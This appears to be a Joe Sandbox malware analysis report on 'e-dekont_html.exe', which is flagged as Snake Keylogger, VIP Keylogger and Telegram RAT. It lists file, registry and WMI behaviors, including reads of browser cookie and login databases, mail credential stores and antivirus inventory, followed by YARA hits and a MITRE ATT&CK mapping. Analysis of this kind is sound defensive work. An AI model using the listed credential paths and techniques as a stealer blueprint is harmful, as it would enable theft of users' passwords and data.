Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\e-dekont_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\e-dekont_html.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\e-dekont_html.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3785666315.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 8128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	111 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report e-dekont_html.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
e-dekont_html.exe